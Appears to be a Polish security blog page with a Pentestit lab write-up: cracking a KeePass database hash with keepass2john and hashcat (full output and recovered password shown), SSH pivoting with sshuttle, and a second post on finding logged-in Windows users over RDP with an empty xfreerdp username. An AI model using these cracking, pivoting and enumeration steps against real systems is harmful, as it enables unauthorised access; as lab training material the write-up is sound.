sobota, 16 września 2017

Pentestit Lab v11 - CLOUD token [writeup]

Na serwerze 192.168.10.1 w /var/tmp znajdujemy dump.pcap z pcapa nalezy wyciagnac hasło do owncloud na 192.168.10.3




z owncloud pobieramy my_store.kdbx


./keepass2john my_store.kdbx > my_store.hash2

my_store:$keepass$*2*100000*222*248fc218b7a47edeecd7a79e8587d5ff2c2221d98efd99837fe198ab0de8a82e*330c91f974cb4df1d015bb15456d382db9c0c2f362909d5cd74f9b951fdee2f7*828fb21b74cda7ae28a21473aaa62384*f974657de86a3aca6faec09804d852a4df5fba5847e54d18e12bd81c33cce528*7ca22042949d204e2f35aae52982946c101679205aa8db0ece2135cdb574170c

usuwamy z pliku początek "my_store:"

$keepass$*2*100000*222*248fc218b7a47edeecd7a79e8587d5ff2c2221d98efd99837fe198ab0de8a82e*330c91f974cb4df1d015bb15456d382db9c0c2f362909d5cd74f9b951fdee2f7*828fb21b74cda7ae28a21473aaa62384*f974657de86a3aca6faec09804d852a4df5fba5847e54d18e12bd81c33cce528*7ca22042949d204e2f35aae52982946c101679205aa8db0ece2135cdb574170c:reajel


PS E:\Tools\hashcat-3.6.0> .\hashcat64.exe -m 13400 -a 0 -w 3 ..\..\pentestit\my_store.hash2 ..\..\rockyou.txt --show
$keepass$*2*100000*222*248fc218b7a47edeecd7a79e8587d5ff2c2221d98efd99837fe198ab0de8a82e*330c91f974cb4df1d015bb15456d382db9c0c2f362909d5cd74f9b951fdee2f7*828fb21b74cda7ae28a21473aaa62384*f974657de86a3aca6faec09804d852a4df5fba5847e54d18e12bd81c33cce528*7ca22042949d204e2f35aae52982946c101679205aa8db0ece2135cdb574170c:reajel

Session..........: hashcat
Status...........: Cracked
Hash.Type........: KeePass 1 (AES/Twofish) and KeePass 2 (AES)
Hash.Target......: $keepass$*2*100000*222*248fc218b7a47edeecd7a79e8587...74170c
Time.Started.....: Sat Sep 16 16:53:59 2017 (29 mins, 47 secs)
Time.Estimated...: Sat Sep 16 17:23:46 2017 (0 secs)
Guess.Base.......: File (..\..\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:     2621 H/s (146.45ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4685824/14343297 (32.67%)
Rejected.........: 0/4685824 (0.00%)
Restore.Point....: 4259840/14343297 (29.70%)
Candidates.#1....: ridebmxdd -> phred2525
HWMon.Dev.#1.....: Temp: 72c Fan: 33% Util:100% Core:1303MHz Mem:3004MHz Bus:16

Started: Sat Sep 16 16:53:54 2017
Stopped: Sat Sep 16 17:23:48 2017
PS E:\Tools\hashcat-3.6.0>

Hasło złamane.

Po zaimportowaniu pliku do keepass v2 uzyskamy dostęp do tokena: Sky_is_Over!

Tunel SSH pomiędzy maszyną, a kilkoma sieciami


https://github.com/apenwarr/sshuttle

sshuttle -e "ssh -i file.key" -r w4cky@172.16.0.252 192.168.10.0/24 192.168.11.0/24

nie wymaga roota :)

czwartek, 14 września 2017

Wykrywanie zalogowanych użytkowników w Windows przez RDP jeśli dla logowania potrzebny jest kerberos



(ms-wbt-server Microsoft Terminal Service.)

Problem z systemem Windows RDP polega na tym, że podczas próby ustanowienia sesji RDP konieczne będzie posiadanie prawidłowej nazwy użytkownika / hasła, która jest uwierzytelniana przez Kerberos, a także użytkownik tworzący połączenie musi być częścią grupy RDP w usłudze Active Directory, aby móc się połączyć.

Więc co powinniśmy zrobić?


Cóż, możemy próbować połączyć się z urządzeniem za pośrednictwem RDesktop i zobaczyć, kto jest zalogowany, ale to nie będzie działało, ponieważ program RDesktop nie używa schematu uwierzytelniania Kerberos, który spowodowałby awarię połączenia, a bez prawidłowej nazwy użytkownika spróbuje do połączenia jako root i zobaczymy, że userem dostępnym jest root co będzie błędne.

Możemy w rzeczywistości korzystać z innego narzędzia RDP o nazwie XFreeRDP, który wykorzystuje schemat uwierzytelniania Kerberos - ale tak nie jest! XFreeRDP ma fajną funkcję, która pozwala na wykrycie ważnych użytkowników na komputerze, jeśli nie wysyłasz żadnej nazwy użytkownika podczas łączenia!

xfreerdp /v:127.0.0.1 -sec-nla /u:""

connected to 127.0.0.1:3389
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@           WARNING: CERTIFICATE NAME MISMATCH!           @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
The hostname used for this connection (127.0.0.1)
does not match the name given in the certificate:
Common Name (CN):
ARM-1
A valid certificate for the wrong name should NOT be trusted!
Certificate details:
Subject: CN = ARM-1
Issuer: CN = ARM-1
Thumbprint: 6e:3f:1f:e6:15:ee:13:c5:9f:f6:87:db:83:32:86:a4:c8:bb:7e:6f
The above X.509 certificate could not be verified, possibly because you do not have the CA certificate in your certificate store, or the certificate has expired. Please look at the documentation on how to create local certificate store for a private CA